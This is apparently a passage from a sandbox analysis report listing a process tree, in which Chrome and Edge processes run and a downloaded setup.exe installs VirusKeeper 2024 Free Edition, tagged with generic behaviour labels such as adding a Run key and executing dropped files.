    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5656,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5708 /prefetch:1
    3⤵
    PID:1640
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4872,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2904 /prefetch:8
    3⤵
    PID:2052
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3624,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4868 /prefetch:8
    3⤵
    PID:4168
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5568,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4840 /prefetch:1
    3⤵
    PID:1872
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5824,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5912 /prefetch:1
    3⤵
    PID:3620
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=6120,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5840 /prefetch:1
    3⤵
    PID:5008
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=6108,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6028 /prefetch:1
    3⤵
    PID:1824
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5724,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5956 /prefetch:8
    3⤵
    PID:4212
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=6104,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5836 /prefetch:1
    3⤵
    PID:228
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5888,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6316 /prefetch:1
    3⤵
    PID:1732
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=6360,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4480 /prefetch:1
    3⤵
    PID:4536
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=6480,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6532 /prefetch:1
    3⤵
    PID:920
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=6472,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6040 /prefetch:1
    3⤵
    PID:612
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=6252,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6164 /prefetch:1
    3⤵
    PID:2504
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6376,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6524 /prefetch:8
    3⤵
    PID:4696
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5868,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5732 /prefetch:8
    3⤵
    PID:2264
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=984,i,4072244157508078916,15572687212596220361,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6644 /prefetch:1
    3⤵
    PID:4792
- - C:\Users\Admin\Downloads\setup.exe
    "C:\Users\Admin\Downloads\setup.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4072
  - - C:\Users\Admin\AppData\Local\Temp\is-ESCJA.tmp\setup.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-ESCJA.tmp\setup.tmp" /SL5="$9022C,134162446,858624,C:\Users\Admin\Downloads\setup.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Program Files directory
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      PID:2832
    - - C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_service.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_service.exe" /INSTALL /SILENT
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:784
    - - C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_ss.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_ss.exe" START
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4944
    - - C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\VirusKeeper.exe
        
        "C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\VirusKeeper.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Checks SCSI registry key(s)
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SendNotifyMessage
        
        PID:3148
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.viruskeeper.com/fr/demande_cle.htm
        6⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of SendNotifyMessage
        
        PID:1460
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc157c46f8,0x7ffc157c4708,0x7ffc157c4718
        7⤵
        
        PID:4148
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
        7⤵
        
        PID:2504
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2044
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
        7⤵
        
        PID:2780
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
        7⤵
        
        PID:1888
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
        7⤵
        
        PID:1508
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 /prefetch:8
        7⤵
        
        PID:2488
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5308
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
        7⤵
        
        PID:5576
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
        7⤵
        
        PID:5584
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
        7⤵
        
        PID:5764
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
        7⤵
        
        PID:5772
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1
        7⤵
        
        PID:2648
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
        7⤵
        
        PID:5468
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
        7⤵
        
        PID:5564
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
        7⤵
        
        PID:4580
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6272 /prefetch:1
        7⤵
        
        PID:6064
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:1
        7⤵
        
        PID:5292
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
        7⤵
        
        PID:5256
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6288 /prefetch:1
        7⤵
        
        PID:5644
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
        7⤵
        
        PID:5144
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1768 /prefetch:1
        7⤵
        
        PID:5804
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2796 /prefetch:1
        7⤵
        
        PID:5812
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:1
        7⤵
        
        PID:5808
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6548 /prefetch:1
        7⤵
        
        PID:5824
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6832 /prefetch:1
        7⤵
        
        PID:5832
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:1
        7⤵
        
        PID:5928
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6964 /prefetch:1
        7⤵
        
        PID:3228
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6992 /prefetch:1
        7⤵
        
        PID:3004
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7372 /prefetch:1
        7⤵
        
        PID:1928
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7580 /prefetch:1
        7⤵
        
        PID:5192
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7792 /prefetch:1
        7⤵
        
        PID:5916
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7932 /prefetch:1
        7⤵
        
        PID:5496
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8084 /prefetch:1
        7⤵
        
        PID:5476
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8808 /prefetch:1
        7⤵
        
        PID:5652
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8940 /prefetch:1
        7⤵
        
        PID:5696
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8924 /prefetch:1
        7⤵
        
        PID:5628
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8944 /prefetch:1
        7⤵
        
        PID:5688
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9196 /prefetch:1
        7⤵
        
        PID:5648
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9332 /prefetch:1
        7⤵
        
        PID:5712
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9616 /prefetch:1
        7⤵
        
        PID:5636
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8208 /prefetch:1
        7⤵
        
        PID:6768
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2160,9098088613695608221,7461846923859711482,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7332 /prefetch:8
        7⤵
        
        PID:6528
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
